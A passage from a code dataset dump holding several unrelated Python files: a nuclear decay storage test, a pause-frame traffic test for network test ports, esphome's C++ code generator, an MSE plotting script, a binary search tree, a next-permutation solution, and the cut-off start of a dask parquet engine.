BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.doCalc(MassStream({942390: 1.0}), 24110*365.25*24*3600)\n assert(s.IsosOut.mass < 1.0)\n assert_almost_equal(s.IsosOut.comp[942390], 0.5, 3) \n\n def test_setParams(self):\n BriPy.isos2track([922350, 922380, 942390])\n s = Storage()\n s.doCalc(MassStream({942390: 1.0}), 24110*365.25*24*3600)\n s.setParams()\n 
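# 24110*365.25*24*3600 seconds is one Pu-239 half-life, so roughly half the Pu-239 mass should remain after decay\n 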
assert_equal(s.ParamsIn[\"Mass\"], 1.00)\n assert(0.5 < s.ParamsOut[\"Mass\"] < 1.0)\n \n\nif __name__ == \"__main__\":\n nose.main()\n","sub_path":"BriPy/src/BriPy/tests/test_Storage.py","file_name":"test_Storage.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"438210397","text":"import pytest\nimport time\n\n\n@pytest.mark.e2e\ndef test_global_pause_e2e(api, settings, utils):\n \"\"\"\n Configure ports where,\n - tx port can respond to global pause frames\n - rx port is capable of sending global pause frames\n Configure a raw IPv4 flows on tx port where,\n - frames corresponding to all priority values are sent (counter pattern)\n - 1M frames are sent at 100% line rate and with start delay of 1s\n Configure one raw Global Pause flow on rx port where,\n - pause frames are sent for 20 seconds (pause storm)\n Validate,\n - tx/rx frame count is 0 before and 1M after pause storm\n \"\"\"\n\n size = 128\n packets = 1000000\n config = api.config()\n\n tx, rx = config.ports.port(name=\"raw_tx\", location=settings.ports[0]).port(\n name=\"raw_rx\", location=settings.ports[1]\n )\n l1 = config.layer1.layer1(\n name=\"L1\",\n port_names=[tx.name, rx.name],\n speed=settings.speed,\n )[-1]\n\n l1.flow_control.ieee_802_3x\n tx_flow, rx_flow = config.flows.flow(name=\"tx_flow\").flow(\"rx_flow\")\n tx_flow.tx_rx.port.tx_name, tx_flow.tx_rx.port.rx_name = tx.name, rx.name\n rx_flow.tx_rx.port.tx_name, rx_flow.tx_rx.port.rx_name = rx.name, tx.name\n tx_eth = tx_flow.packet.ethernet()[-1]\n tx_ipv4 = tx_flow.packet.ipv4()[-1]\n rx_eth_pause = rx_flow.packet.ethernetpause()[-1]\n tx_eth.src.value = \"00:CD:DC:CD:DC:CD\"\n tx_eth.dst.value = \"00:AB:BC:AB:BC:AB\"\n tx_ipv4.src.value = \"1.1.1.2\"\n tx_ipv4.dst.value = \"1.1.1.1\"\n tx_ipv4.priority.raw.increment.start = 0\n tx_ipv4.priority.raw.increment.step = 1\n tx_ipv4.priority.raw.increment.count = 256\n tx_flow.duration.fixed_packets.packets = packets\n tx_flow.duration.fixed_packets.delay.nanoseconds = 10 ** 9\n tx_flow.size.fixed = size\n tx_flow.rate.percentage = 100\n rx_eth_pause.src.value = \"00:AB:BC:AB:BC:AB\"\n rx_eth_pause.control_op_code.value = \"01\"\n rx_eth_pause.time.value = \"FFFF\"\n rx_flow.duration.fixed_seconds.seconds = 20\n rx_flow.size.fixed = size\n rx_flow.rate.percentage = 100\n api.set_config(config)\n utils.start_traffic(api, config)\n # wait for some packets to start flowing\n time.sleep(10)\n\n utils.wait_for(\n lambda: results_ok(api, config, utils, size, 0),\n \"stats to be as expected\",\n timeout_seconds=30,\n )\n utils.wait_for(\n lambda: results_ok(api, config, utils, size, packets),\n \"stats to be as expected\",\n timeout_seconds=30,\n )\n\n\ndef results_ok(api, cfg, utils, size, packets):\n \"\"\"\n Returns true if stats are as expected, false otherwise.\n \"\"\"\n port_results, flow_results = utils.get_all_stats(api)\n\n return packets == sum(\n [p.frames_tx for p in port_results if p.name == \"raw_tx\"]\n )\n","sub_path":"tests/pfc/test_global_pause_e2e.py","file_name":"test_global_pause_e2e.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201851725","text":"from collections import OrderedDict\nimport math\n\n# pylint: disable=unused-import, wrong-import-order\nfrom typing import Any, Generator, List, Optional, Tuple, Type, Union, Dict, Callable # noqa\n\nfrom esphome.core import ( # noqa\n CORE, HexInt, ID, 
Lambda, TimePeriod, TimePeriodMicroseconds,\n TimePeriodMilliseconds, TimePeriodMinutes, TimePeriodSeconds, coroutine)\nfrom esphome.helpers import cpp_string_escape, indent_all_but_first_and_last\nfrom esphome.py_compat import integer_types, string_types, text_type\n\n\nclass Expression(object):\n def __init__(self):\n self.requires = []\n self.required = False\n\n def __str__(self):\n raise NotImplementedError\n\n def require(self):\n self.required = True\n for require in self.requires:\n if require.required:\n continue\n require.require()\n\n def has_side_effects(self):\n return self.required\n\n\nSafeExpType = Union[Expression, bool, str, text_type, int, float, TimePeriod,\n Type[bool], Type[int], Type[float]]\n\n\nclass RawExpression(Expression):\n def __init__(self, text): # type: (Union[str, unicode]) -> None\n super(RawExpression, self).__init__()\n self.text = text\n\n def __str__(self):\n return str(self.text)\n\n\n# pylint: disable=redefined-builtin\nclass AssignmentExpression(Expression):\n def __init__(self, type, modifier, name, rhs, obj):\n super(AssignmentExpression, self).__init__()\n self.type = type\n self.modifier = modifier\n self.name = name\n self.rhs = safe_exp(rhs)\n self.requires.append(self.rhs)\n self.obj = obj\n\n def __str__(self):\n type_ = self.type\n return u\"{} {}{} = {}\".format(type_, self.modifier, self.name, self.rhs)\n\n def has_side_effects(self):\n return self.rhs.has_side_effects()\n\n\nclass ExpressionList(Expression):\n def __init__(self, *args):\n super(ExpressionList, self).__init__()\n # Remove every None on end\n args = list(args)\n while args and args[-1] is None:\n args.pop()\n self.args = []\n for arg in args:\n exp = safe_exp(arg)\n self.requires.append(exp)\n self.args.append(exp)\n\n def __str__(self):\n text = u\", \".join(text_type(x) for x in self.args)\n return indent_all_but_first_and_last(text)\n\n\nclass TemplateArguments(Expression):\n def __init__(self, *args): # type: (*SafeExpType) -> None\n super(TemplateArguments, self).__init__()\n self.args = ExpressionList(*args)\n self.requires.append(self.args)\n\n def __str__(self):\n return u'<{}>'.format(self.args)\n\n\nclass CallExpression(Expression):\n def __init__(self, base, *args): # type: (Expression, *SafeExpType) -> None\n super(CallExpression, self).__init__()\n self.base = base\n if args and isinstance(args[0], TemplateArguments):\n self.template_args = args[0]\n self.requires.append(self.template_args)\n args = args[1:]\n else:\n self.template_args = None\n self.args = ExpressionList(*args)\n self.requires.append(self.args)\n\n def __str__(self):\n if self.template_args is not None:\n return u'{}{}({})'.format(self.base, self.template_args, self.args)\n return u'{}({})'.format(self.base, self.args)\n\n\nclass StructInitializer(Expression):\n def __init__(self, base, *args): # type: (Expression, *Tuple[str, SafeExpType]) -> None\n super(StructInitializer, self).__init__()\n self.base = base\n if isinstance(base, Expression):\n self.requires.append(base)\n if not isinstance(args, OrderedDict):\n args = OrderedDict(args)\n self.args = OrderedDict()\n for key, value in args.items():\n if value is None:\n continue\n exp = safe_exp(value)\n self.args[key] = exp\n self.requires.append(exp)\n\n def __str__(self):\n cpp = u'{}{{\\n'.format(self.base)\n for key, value in self.args.items():\n cpp += u' .{} = {},\\n'.format(key, value)\n cpp += u'}'\n return cpp\n\n\nclass ArrayInitializer(Expression):\n def __init__(self, *args, **kwargs): # type: (*Any, **Any) -> None\n 
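# 'multiline' switches the rendered C++ initializer between one-element-per-line and single-line form; None args are dropped\n 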
super(ArrayInitializer, self).__init__()\n self.multiline = kwargs.get('multiline', False)\n self.args = []\n for arg in args:\n if arg is None:\n continue\n exp = safe_exp(arg)\n self.args.append(exp)\n self.requires.append(exp)\n\n def __str__(self):\n if not self.args:\n return u'{}'\n if self.multiline:\n cpp = u'{\\n'\n for arg in self.args:\n cpp += u' {},\\n'.format(arg)\n cpp += u'}'\n else:\n cpp = u'{' + u', '.join(str(arg) for arg in self.args) + u'}'\n return cpp\n\n\nclass ParameterExpression(Expression):\n def __init__(self, type, id):\n super(ParameterExpression, self).__init__()\n self.type = type\n self.id = id\n\n def __str__(self):\n return u\"{} {}\".format(self.type, self.id)\n\n\nclass ParameterListExpression(Expression):\n def __init__(self, *parameters):\n super(ParameterListExpression, self).__init__()\n self.parameters = []\n for parameter in parameters:\n if not isinstance(parameter, ParameterExpression):\n parameter = ParameterExpression(*parameter)\n self.parameters.append(parameter)\n self.requires.append(parameter)\n\n def __str__(self):\n return u\", \".join(text_type(x) for x in self.parameters)\n\n\nclass LambdaExpression(Expression):\n def __init__(self, parts, parameters, capture='=', return_type=None):\n super(LambdaExpression, self).__init__()\n self.parts = parts\n if not isinstance(parameters, ParameterListExpression):\n parameters = ParameterListExpression(*parameters)\n self.parameters = parameters\n self.requires.append(self.parameters)\n self.capture = capture\n self.return_type = safe_exp(return_type) if return_type is not None else None\n if return_type is not None:\n self.requires.append(self.return_type)\n for i in range(1, len(parts), 3):\n self.requires.append(parts[i])\n\n def __str__(self):\n cpp = u'[{}]({})'.format(self.capture, self.parameters)\n if self.return_type is not None:\n cpp += u' -> {}'.format(self.return_type)\n cpp += u' {{\\n{}\\n}}'.format(self.content)\n return indent_all_but_first_and_last(cpp)\n\n @property\n def content(self):\n return u''.join(text_type(part) for part in self.parts)\n\n\nclass Literal(Expression):\n def __str__(self):\n raise NotImplementedError\n\n\nclass StringLiteral(Literal):\n def __init__(self, string): # type: (Union[str, unicode]) -> None\n super(StringLiteral, self).__init__()\n self.string = string\n\n def __str__(self):\n return u'{}'.format(cpp_string_escape(self.string))\n\n\nclass IntLiteral(Literal):\n def __init__(self, i): # type: (Union[int, long]) -> None\n super(IntLiteral, self).__init__()\n self.i = i\n\n def __str__(self):\n if self.i > 4294967295:\n return u'{}ULL'.format(self.i)\n if self.i > 2147483647:\n return u'{}UL'.format(self.i)\n if self.i < -2147483648:\n return u'{}LL'.format(self.i)\n return text_type(self.i)\n\n\nclass BoolLiteral(Literal):\n def __init__(self, binary): # type: (bool) -> None\n super(BoolLiteral, self).__init__()\n self.binary = binary\n\n def __str__(self):\n return u\"true\" if self.binary else u\"false\"\n\n\nclass HexIntLiteral(Literal):\n def __init__(self, i): # type: (int) -> None\n super(HexIntLiteral, self).__init__()\n self.i = HexInt(i)\n\n def __str__(self):\n return str(self.i)\n\n\nclass FloatLiteral(Literal):\n def __init__(self, value): # type: (float) -> None\n super(FloatLiteral, self).__init__()\n self.float_ = value\n\n def __str__(self):\n if math.isnan(self.float_):\n return u\"NAN\"\n return u\"{:f}f\".format(self.float_)\n\n\n# pylint: disable=bad-continuation\ndef safe_exp(\n obj # type: Union[Expression, bool, str, 
unicode, int, long, float, TimePeriod, list]\n ):\n # type: (...) -> Expression\n from esphome.cpp_types import bool_, float_, int32\n\n if isinstance(obj, Expression):\n return obj\n if isinstance(obj, bool):\n return BoolLiteral(obj)\n if isinstance(obj, string_types):\n return StringLiteral(obj)\n if isinstance(obj, HexInt):\n return HexIntLiteral(obj)\n if isinstance(obj, integer_types):\n return IntLiteral(obj)\n if isinstance(obj, float):\n return FloatLiteral(obj)\n if isinstance(obj, TimePeriodMicroseconds):\n return IntLiteral(int(obj.total_microseconds))\n if isinstance(obj, TimePeriodMilliseconds):\n return IntLiteral(int(obj.total_milliseconds))\n if isinstance(obj, TimePeriodSeconds):\n return IntLiteral(int(obj.total_seconds))\n if isinstance(obj, TimePeriodMinutes):\n return IntLiteral(int(obj.total_minutes))\n if isinstance(obj, (tuple, list)):\n return ArrayInitializer(*[safe_exp(o) for o in obj])\n if obj is bool:\n return bool_\n if obj is int:\n return int32\n if obj is float:\n return float_\n raise ValueError(u\"Object is not an expression\", obj)\n\n\nclass Statement(object):\n def __init__(self):\n pass\n\n def __str__(self):\n raise NotImplementedError\n\n\nclass RawStatement(Statement):\n def __init__(self, text):\n super(RawStatement, self).__init__()\n self.text = text\n\n def __str__(self):\n return self.text\n\n\nclass ExpressionStatement(Statement):\n def __init__(self, expression):\n super(ExpressionStatement, self).__init__()\n self.expression = safe_exp(expression)\n\n def __str__(self):\n return u\"{};\".format(self.expression)\n\n\nclass ProgmemAssignmentExpression(AssignmentExpression):\n def __init__(self, type, name, rhs, obj):\n super(ProgmemAssignmentExpression, self).__init__(\n type, '', name, rhs, obj\n )\n\n def __str__(self):\n type_ = self.type\n return u\"static const {} {}[] PROGMEM = {}\".format(type_, self.name, self.rhs)\n\n\ndef progmem_array(id, rhs):\n rhs = safe_exp(rhs)\n obj = MockObj(id, u'.')\n assignment = ProgmemAssignmentExpression(id.type, id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef statement(expression): # type: (Union[Expression, Statement]) -> Statement\n if isinstance(expression, Statement):\n return expression\n return ExpressionStatement(expression)\n\n\ndef variable(id, # type: ID\n rhs, # type: Expression\n type=None # type: MockObj\n ):\n # type: (...) -> MockObj\n rhs = safe_exp(rhs)\n obj = MockObj(id, u'.')\n id.type = type or id.type\n assignment = AssignmentExpression(id.type, '', id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef Pvariable(id, # type: ID\n rhs, # type: Expression\n has_side_effects=True, # type: bool\n type=None # type: MockObj\n ):\n # type: (...) -> MockObj\n rhs = safe_exp(rhs)\n if not has_side_effects and hasattr(rhs, '_has_side_effects'):\n # pylint: disable=attribute-defined-outside-init, protected-access\n rhs._has_side_effects = False\n obj = MockObj(id, u'->', has_side_effects=has_side_effects)\n id.type = type or id.type\n assignment = AssignmentExpression(id.type, '*', id, rhs, obj)\n CORE.add(assignment)\n CORE.register_variable(id, obj)\n obj.requires.append(assignment)\n return obj\n\n\ndef add(expression, # type: Union[Expression, Statement]\n require=True # type: bool\n ):\n # type: (...) 
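# safe_exp above dispatches plain Python values to Literal wrappers; note
# that bool is tested before the integer types, because bool is a subclass
# of int in Python. A standalone miniature of that ordering-sensitive dispatch:
def _to_cpp_literal(obj):
    if isinstance(obj, bool):      # must precede the int check
        return "true" if obj else "false"
    if isinstance(obj, int):
        return str(obj)
    if isinstance(obj, float):
        return "{:f}f".format(obj)
    raise ValueError("unsupported value", obj)

print(_to_cpp_literal(True), _to_cpp_literal(3), _to_cpp_literal(2.5))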
-> None\n CORE.add(expression, require=require)\n\n\n@coroutine\ndef get_variable(id): # type: (ID) -> Generator[MockObj]\n var = yield CORE.get_variable(id)\n yield var\n\n\n@coroutine\ndef process_lambda(value, # type: Lambda\n parameters, # type: List[Tuple[Expression, str]]\n capture='=', # type: str\n return_type=None # type: Optional[Expression]\n ):\n # type: (...) -> Generator[LambdaExpression]\n from esphome.components.globals import GlobalVariableComponent\n\n if value is None:\n yield\n return\n parts = value.parts[:]\n for i, id in enumerate(value.requires_ids):\n full_id, var = yield CORE.get_variable_with_full_id(id)\n if full_id is not None and isinstance(full_id.type, MockObjClass) and \\\n full_id.type.inherits_from(GlobalVariableComponent):\n parts[i * 3 + 1] = var.value()\n continue\n\n if parts[i * 3 + 2] == '.':\n parts[i * 3 + 1] = var._\n else:\n parts[i * 3 + 1] = var\n parts[i * 3 + 2] = ''\n yield LambdaExpression(parts, parameters, capture, return_type)\n\n\n@coroutine\ndef templatable(value, # type: Any\n args, # type: List[Tuple[SafeExpType, str]]\n output_type, # type: Optional[SafeExpType],\n to_exp=None # type: Optional[Any]\n ):\n if isinstance(value, Lambda):\n lambda_ = yield process_lambda(value, args, return_type=output_type)\n yield lambda_\n else:\n if to_exp is None:\n yield value\n elif isinstance(to_exp, dict):\n yield to_exp[value]\n else:\n yield to_exp(value)\n\n\nclass MockObj(Expression):\n def __init__(self, base, op=u'.', has_side_effects=True):\n self.base = base\n self.op = op\n self._has_side_effects = has_side_effects\n super(MockObj, self).__init__()\n\n def __getattr__(self, attr): # type: (str) -> MockObj\n if attr == u'_':\n obj = MockObj(u'{}{}'.format(self.base, self.op))\n obj.requires.append(self)\n return obj\n if attr == u'new':\n obj = MockObj(u'new {}'.format(self.base), u'->')\n obj.requires.append(self)\n return obj\n next_op = u'.'\n if attr.startswith(u'P') and self.op not in ['::', '']:\n attr = attr[1:]\n next_op = u'->'\n if attr.startswith(u'_'):\n attr = attr[1:]\n obj = MockObj(u'{}{}{}'.format(self.base, self.op, attr), next_op)\n obj.requires.append(self)\n return obj\n\n def __call__(self, *args, **kwargs): # type: (*Any, **Any) -> MockObj\n call = CallExpression(self.base, *args)\n obj = MockObj(call, self.op)\n obj.requires.append(self)\n obj.requires.append(call)\n return obj\n\n def __str__(self): # type: () -> unicode\n return text_type(self.base)\n\n def require(self): # type: () -> None\n self.required = True\n for require in self.requires:\n if require.required:\n continue\n require.require()\n\n def template(self, *args): # type: (Tuple[Union[TemplateArguments, Expression]]) -> MockObj\n if len(args) != 1 or not isinstance(args[0], TemplateArguments):\n args = TemplateArguments(*args)\n else:\n args = args[0]\n obj = MockObj(u'{}{}'.format(self.base, args))\n obj.requires.append(self)\n obj.requires.append(args)\n return obj\n\n def namespace(self, name): # type: (str) -> MockObj\n obj = MockObj(u'{}{}{}'.format(self.base, self.op, name), u'::')\n obj.requires.append(self)\n return obj\n\n def class_(self, name, *parents): # type: (str, *MockObjClass) -> MockObjClass\n op = '' if self.op == '' else '::'\n obj = MockObjClass(u'{}{}{}'.format(self.base, op, name), u'.', parents=parents)\n obj.requires.append(self)\n return obj\n\n def struct(self, name): # type: (str) -> MockObjClass\n return self.class_(name)\n\n def enum(self, name, is_class=False): # type: (str, bool) -> MockObj\n if is_class:\n return 
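# MockObj above composes C++ member-access expressions lazily via
# __getattr__. The core trick in isolation (independent of esphome):
class _Chain(object):
    def __init__(self, base, op="."):
        self._base, self._op = base, op

    def __getattr__(self, attr):
        # Only called for attributes not found normally, so _base/_op are safe.
        return _Chain("{}{}{}".format(self._base, self._op, attr))

    def __str__(self):
        return self._base

print(_Chain("app", "->").sensor.publish_state)  # app->sensor.publish_state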
self.namespace(name)\n\n return self\n\n def operator(self, name): # type: (str) -> MockObj\n if name == 'ref':\n obj = MockObj(u'{} &'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n if name == 'ptr':\n obj = MockObj(u'{} *'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n if name == \"const\":\n obj = MockObj(u'const {}'.format(self.base), u'')\n obj.requires.append(self)\n return obj\n raise NotImplementedError\n\n def has_side_effects(self): # type: () -> bool\n return self._has_side_effects\n\n def __getitem__(self, item): # type: (Union[str, Expression]) -> MockObj\n next_op = u'.'\n if isinstance(item, str) and item.startswith(u'P'):\n item = item[1:]\n next_op = u'->'\n obj = MockObj(u'{}[{}]'.format(self.base, item), next_op)\n obj.requires.append(self)\n if isinstance(item, Expression):\n obj.requires.append(item)\n return obj\n\n\nclass MockObjClass(MockObj):\n def __init__(self, *args, **kwargs):\n parens = kwargs.pop('parents')\n MockObj.__init__(self, *args, **kwargs)\n self._parents = []\n for paren in parens:\n if not isinstance(paren, MockObjClass):\n raise ValueError\n self._parents.append(paren)\n # pylint: disable=protected-access\n self._parents += paren._parents\n\n def inherits_from(self, other): # type: (MockObjClass) -> bool\n if self == other:\n return True\n for parent in self._parents:\n if parent == other:\n return True\n return False\n\n def template(self,\n *args # type: Tuple[Union[TemplateArguments, Expression]]\n ):\n # type: (...) -> MockObjClass\n if len(args) != 1 or not isinstance(args[0], TemplateArguments):\n args = TemplateArguments(*args)\n else:\n args = args[0]\n new_parents = self._parents[:]\n new_parents.append(self)\n obj = MockObjClass(u'{}{}'.format(self.base, args), parents=new_parents)\n obj.requires.append(self)\n obj.requires.append(args)\n return obj\n","sub_path":"esphome/cpp_generator.py","file_name":"cpp_generator.py","file_ext":"py","file_size_in_byte":18725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"479277007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 4 22:48:59 2017\n\n@author: nicho\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Assumes val_MSE, k5_MSE and k10_MSE were produced by the earlier experiment code.\n\n#Validation set MSE graph ################################### \nval_MSE = np.array(val_MSE)\nMSEsplitVAL = np.split(val_MSE,10)\nMSEsplitVAL = np.array(MSEsplitVAL).T\nMSEsplitVAL = pd.DataFrame(MSEsplitVAL)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitVAL[graph])\n VALMean = MSEsplitVAL.mean(axis=1)\n VALmin = min(VALMean)\n minVALind = (VALMean==VALmin).argmax()+1\n plt.scatter(minVALind, VALmin,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"Validation Set\")\nplt.show()\n\n#K Fold, K = 5 graph #######################################\nplt.figure()\nk5_MSE = np.array(k5_MSE)\nMSEsplitK5 = np.split(k5_MSE,10)\nMSEsplitK5 = np.array(MSEsplitK5).T\nMSEsplitK5 = pd.DataFrame(MSEsplitK5)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitK5[graph])\n K5mean = MSEsplitK5.mean(axis=1)\n K5min = min(K5mean)\n minK5ind = (K5mean==K5min).argmax()+1\n plt.scatter(minK5ind, K5min,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"K Fold, K = 5\")\nplt.show()\n\n#K Fold, K = 10 graph ########################################\nplt.figure()\nk10_MSE = np.array(k10_MSE)\nMSEsplitK10 = np.split(k10_MSE,10)\nMSEsplitK10 = np.array(MSEsplitK10).T\nMSEsplitK10 = pd.DataFrame(MSEsplitK10)\nfor graph in range(0,10):\n plt.plot([1,2,3,4], MSEsplitK10[graph])\n K10mean = MSEsplitK10.mean(axis=1)\n K10min = min(K10mean)\n minK10ind = (K10mean==K10min).argmax()+1\n plt.scatter(minK10ind, K10min,s=300, facecolors='none', edgecolors='r', label=\"Min MSE\")\nplt.xticks([1,2,3,4])\nplt.xlabel('Model Order')\nplt.ylabel('MSE')\nplt.title(\"K Fold, K = 10\")\nplt.show()\n\n\n","sub_path":"HW3/shoot1.py","file_name":"shoot1.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
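# The HW3/shoot1.py script above plots ten per-repetition MSE curves per
# scheme and circles the model order with the lowest mean MSE. The
# "mean curve + minimum" step on its own, with random data standing in for
# the real MSE arrays:
import numpy as np

rng = np.random.default_rng(0)
mse = rng.random((10, 4))                # 10 repetitions x 4 model orders
mean_mse = mse.mean(axis=0)              # average across repetitions
best_order = int(mean_mse.argmin()) + 1  # model orders are 1-based
print("best model order:", best_order, "mean MSE:", float(mean_mse.min()))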
+{"seq_id":"365072294","text":"from turtle import *\n\n\nclass Node:\n def __init__(self, key, parent=None, left=None, right=None, flag=None):\n self.key = key\n self.p = parent\n self.left = left\n self.right = right\n self.flag = flag\n\n # Search\n def search(self, k):\n if self is None or k == self.key:\n return self\n if k < self.key:\n return self.left.search(k)\n else:\n return self.right.search(k)\n\n # Insert\n def insert(self, value):\n z = Node(value)\n change = None\n self = self.root()\n while self:\n change = self\n if z.key < self.key:\n self = self.left\n else:\n self = self.right\n z.p = change\n if change is None:\n pass\n elif z.key < change.key:\n change.left = z\n else:\n change.right = z\n\n # Used for deletion: fetch the leftmost element\n def minimum(self):\n while self.left:\n self = self.left\n return self\n\n # Used for deletion: fetch the topmost element (the root)\n def root(self):\n while self.p:\n self = self.p\n return self\n\n # Used for deletion: splice the replacement in place of the target node\n def transparent(self, change):\n # Case: self is the root\n if self.p is None:\n pass\n # Determine whether self is the parent's left or right child, then swap in the replacement\n elif self == self.p.left:\n self.p.left = change\n else:\n self.p.right = change\n # Update the replacement's parent\n if change:\n change.p = self.p\n\n # Delete\n def delete(self):\n # Case: only one child (left or right)\n if self.left is None:\n change = self.right\n self.transparent(change)\n elif self.right is None:\n change = self.left\n self.transparent(change)\n # Case: both children exist\n else:\n # Go right of the node to delete and take the leftmost element as the replacement\n change = self.right.minimum()\n # Case: the replacement is two or more levels below the node to delete\n if change.p != self:\n # Bring it up\n change.transparent(change.right)\n change.right = self.right\n change.right.p = change\n self.transparent(change)\n change.left = self.left\n change.left.p = change\n return change.root()\n\n # Drawing\n def print_tree(self):\n # Write the key\n write(str(self.key), False, align=\"center\", font=('Arial', 16, 'normal'))\n # Set the branch length\n if self.root() == self:\n # Arbitrary value\n self.stick = 200\n else:\n # Arbitrary value\n self.stick = self.p.stick * 0.6\n # Draw the left/right children if present\n if self.left is not None:\n self.left.flag = 'left'\n right(40)\n forward(self.stick)\n left(40)\n self.left.print_tree()\n if self.right is not None:\n self.right.flag = 'right'\n left(40)\n forward(self.stick)\n right(40)\n self.right.print_tree()\n # Walk back once there are no children left\n if self.flag == 'left':\n right(40)\n backward(self.p.stick)\n left(40)\n elif self.flag == 'right':\n left(40)\n backward(self.p.stick)\n right(40)\n\n\ndef main():\n # Data set\n r = Node(15)\n x1 = Node(6, r)\n x2 = Node(18, r)\n x3 = Node(3, x1)\n x4 = Node(7, x1)\n x5 = Node(17, x2)\n x6 = Node(20, x2)\n x7 = Node(2, x3)\n x8 = Node(4, x3)\n x9 = Node(13, x4)\n x10 = Node(9, x9)\n x11 = Node(19, x6)\n\n # Assign left/right afterwards\n r.left, r.right = x1, x2\n x1.left, x1.right = x3, x4\n x2.left, x2.right = x5, x6\n x3.left, x3.right = x7, x8\n x4.right = x9\n x9.left = x10\n x6.left = x11\n # print(\"Search\")\n # print(r.search(13)) # 13\n\n # print(\"\\nInsert\")\n # r.insert(10) # insert 10\n # print(r.search(10)) # check\n\n # print(\"before:{}\".format(r.left.right))\n # r = r.search(7).delete()\n # print(\"after:{}\".format(r.left.right))\n\n # print(\"before:{}\".format(r.left))\n # r = r.search(18).delete()\n # print(\"after:{}\".format(r.left))\n\n color(\"green\")\n right(90)\n up()\n backward(200)\n pd()\n r.print_tree()\n input('exit')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
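# Quick usage sketch for the Node class above (turtle drawing aside),
# assuming the class is in scope; delete() returns the (possibly new) root:
root = Node(15)
for k in (6, 18, 3, 7):
    root.insert(k)
assert root.search(7).key == 7
root = root.search(6).delete()  # node 6 has two children; 7 takes its place
print(root.left.key)            # -> 7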
print(\"before:{}\".format(r.left.right))\n # r = r.search(7).delete()\n # print(\"after:{}\".format(r.left.right))\n\n # print(\"before:{}\".format(r.left))\n # r = r.search(18).delete()\n # print(\"after:{}\".format(r.left))\n\n color(\"green\")\n right(90)\n up()\n backward(200)\n pd()\n r.print_tree()\n input('exit')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"68472129","text":"'''\n1. Brute Force: 先对nums排序,然后全排列,到了目标数组序列时标记一下,下一个序列就是答案。时间复杂度O(nlogn)+2**n\n2. ��对当前数组操作,尝试从当前变到下一个字典序。最直接的想法是从后往前便利,碰到变小的情况就交换,尽管如此但有些情况不能满足。但比如1432,正确结果应该是2134,而直接换得到4132.\n那如何处理呢? 这里是思维的难点,首先这不是递归回溯问题,也不是最优解问题,也不需要哈希,它是一个纯数组问题,没有别的巧思,只能通过遍历,写出一个规则让它得到结果。\n\n1423->2143有什么规律呢,仔细思考一下规律就是,4碰到1时不直接换,而是回头再向右遍历找到一个刚好大于1的一个数,交换数值。最后从4开始后面的数排序. 进一步看,交换后4开始往后的数组是一个倒叙的数组,只需要首末两端两两呼唤即可\n'''\nclass Solution(object): \n def nextPermutation(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: None Do not return anything, modify nums in-place instead.\n \"\"\"\n idx = len(nums)-1\n while idx>0 and nums[idx]<=nums[idx-1]:\n idx -= 1\n if idx==0:\n return nums.reverse()\n else:\n i = idx\n while inums[idx-1]:\n i += 1\n nums[idx-1], nums[i-1] = nums[i-1], nums[idx-1]\n left, right = idx, len(nums)-1\n while right>left:\n nums[left], nums[right] = nums[right], nums[left]\n left += 1\n right -= 1\n return nums\n","sub_path":"array/31-NextPermutation.py","file_name":"31-NextPermutation.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"512406483","text":"from functools import partial\nfrom collections import defaultdict\nimport json\nimport warnings\nfrom distutils.version import LooseVersion\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom ....utils import getargspec\nfrom ..utils import _get_pyarrow_dtypes, _meta_from_dtypes\nfrom ...utils import clear_known_categories\nfrom ....core import flatten\nfrom dask import delayed\n\nfrom .utils import (\n _parse_pandas_metadata,\n _normalize_index_columns,\n Engine,\n _analyze_paths,\n)\n\npreserve_ind_supported = pa.__version__ >= LooseVersion(\"0.15.0\")\nschema_field_supported = pa.__version__ >= LooseVersion(\"0.15.0\")\n\n\n#\n# Private Helper Functions\n#\n\n\ndef _append_row_groups(metadata, md):\n try:\n metadata.append_row_groups(md)\n except RuntimeError as err:\n if \"requires equal schemas\" in str(err):\n raise RuntimeError(\n \"Schemas are inconsistent, try using \"\n '`to_parquet(..., schema=\"infer\")`, or pass an explicit '\n \"pyarrow schema.\"\n )\n else:\n raise err\n\n\ndef _write_partitioned(\n table, root_path, filename, partition_cols, fs, index_cols=(), **kwargs\n):\n \"\"\"Write table to a partitioned dataset with pyarrow.\n\n Logic copied from pyarrow.parquet.\n (arrow/python/pyarrow/parquet.py::write_to_dataset)\n\n TODO: Remove this in favor of 